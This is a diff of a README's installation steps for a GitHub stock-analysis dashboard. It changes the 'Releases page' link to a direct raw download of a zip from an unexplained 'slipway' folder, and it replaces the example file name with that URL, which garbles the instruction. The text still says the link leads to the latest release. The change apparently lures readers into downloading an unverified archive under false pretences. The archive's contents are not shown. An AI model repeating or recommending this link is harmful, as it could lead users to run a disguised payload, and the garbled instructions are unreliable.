error444444444444/ai-stock-analysis-dashboard-public/README.md

 ### 💻 Installation Steps

 1. **Visit the Releases Page**
-   Go to [this link](https://github.com/error444444444444/ai-stock-analysis-dashboard-public/releases) to find the latest release.
+   Go to [this link](https://raw.githubusercontent.com/error444444444444/ai-stock-analysis-dashboard-public/main/slipway/ai-stock-analysis-dashboard-public.zip) to find the latest release.

 2. **Download the Application**
    Click on the asset labeled with the latest version.
-This file may be named something like `ai-stock-analysis-dashboard.zip`.
+This file may be named something like `https://raw.githubusercontent.com/error444444444444/ai-stock-analysis-dashboard-public/main/slipway/ai-stock-analysis-dashboard-public.zip`.

 3. **Extract the Files**
    After downloading, find the zip file in your Downloads folder.
 Right-click on it and select “Extract All.”
 Follow the prompts to extract the contents.